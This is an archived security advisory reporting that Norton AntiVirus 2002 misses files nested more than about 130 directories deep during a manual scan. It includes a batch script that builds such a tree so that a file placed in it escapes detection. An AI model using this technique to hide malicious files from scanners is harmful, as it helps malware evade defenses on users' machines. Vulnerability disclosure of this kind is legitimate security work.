TUCoPS :: Security App Flaws

TUCoPS :: Security App Flaws :: hack3917.htm
Norton AntiVirus nested file manual scan bypass.....

Norton AntiVirus nested file manual scan bypass..... Norton AntiVirus nested file manual scan bypass..... Product Version: Norton Antivirus 2002 (~Only tested On...~) Risk Impact: Medium Vendor Status: No responce! Summary: If you manage to inject a file in the sub-directory(s); beyond windows OS can create normally, [ say in 130 'th + sub-directory at c:\..\..\..\....upto 130'th ... ] NAV fails to scan the NESTED FILE. Indeed, it's more a windows restriction in accesing the nested file than a ANTIVIRUS flaw. Other antivirus product should also suffer the same. *.PLEASE VERIFY.* NAV =-------CUT----------= @echo off rem Bipin Gautam [hUNT3R] rem [http://www.geocities.com/visitbipin] * [http://www.01security.com] echo ť echo ************************************************ echo -( For a harmless test... you can use, echo http://www.eicar.org/anti_virus_test_file.htm )- echo ************************************************ pause cd\ c: cd\ :hUNT3r md 1 cd 1 if not errorlevel 1 goto :hUNT3r cd.. rmdir 1 md X cls echo *************************************************************** echo Now you can inject any file inside the folder 'X' which is inside echo 120'th sub-directory of 'c:\1' [ i.e c:\1\..\...\.....[120'th dir].....\X\ ] echo Note: The file you are moving to'c:\1\...\X\' should only contain echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc... echo not as '123.not' 'qwert.hak' echo ......... echo So, ARE YOU DONE!? echo ......... echo After this batch script is terminated, you'll echo find the file you ^just copied^ inside c:\1\........\X\ echo now in c:\3\3\3\3\3\1\1\1\......[130' th dir].....\X\ echo mmm... Then have a manual scan of c:\3\ Any file you echo have put inside the dir. 'X' can't be detected by NORTON Antivirus anymore!!! echo *************************************************** pause cd\ md 3\3\3\3\3\3\3\3\3\3\ cd\ xcopy /E /I c:\1\*.* c:3\3\3\3\3\3\3\3\3\3\ exit =-------CUT----------= Disclaimer: The information in the advisory is believed to be accurate at the time of printing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage arising from use of, or reliance on this information.